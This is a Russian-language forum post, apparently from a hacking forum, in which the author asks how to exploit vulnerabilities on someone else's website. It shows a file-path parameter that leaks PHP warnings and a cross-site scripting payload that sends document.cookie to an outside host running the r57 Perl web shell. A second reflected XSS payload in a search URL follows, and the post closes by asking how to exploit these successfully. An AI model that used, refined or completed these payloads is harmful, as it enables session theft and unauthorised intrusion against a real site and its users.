Добровго всем времени суток!
Вот есть проблема. Возможно кто-нибудь да и поможет ее решить.
1.

Существует сайт, в корне лежит скрипт вида script.php?ch=something Это something берется из папки /FOLDER/
при запросе script.php?ch=' вылазит такой текст:

Warning: file_get_contents(/usr/local/apache/htdocs/FOLDER/\'.txt): failed to open stream: No such file or directory in /usr/local/apache/htdocs/script.php on line 13

пробовал делать так: script.php/?ch="><script>document.location='http://www.myhost.narod.ru/hack/r57pws.pl?%20'%20+document.cookie%3C/script%3E где r57pws.pl - знаменитый перловый шелл
вылазит сообщение:

Warning: file_get_contents(/usr/local/apache/htdocs/FOLDER/\">document.location=\'http://www.myhost.narod.ru/hack/r57pws.pl? \'%2.txt): failed to open stream: No such file or directory in /usr/local/apache/htdocs/script.php on line 13

потом решил перекодировать в hex и опять сделал запрос. тоже ничегно не получилось.


2. script.php?view=1132&search_text=%22%3E%3Cscript%3 Ealert%28%27slert%27%29%3C%2Fscript%3E%3C%22&searc h_in_names=1&search_in_com=1&film_year=1&film_cat= 1&search_filmtype=1 - там возможен межсайтвоый скриптинг




вопрос к вам. каким образом успешно использовать эти уязвимости можно?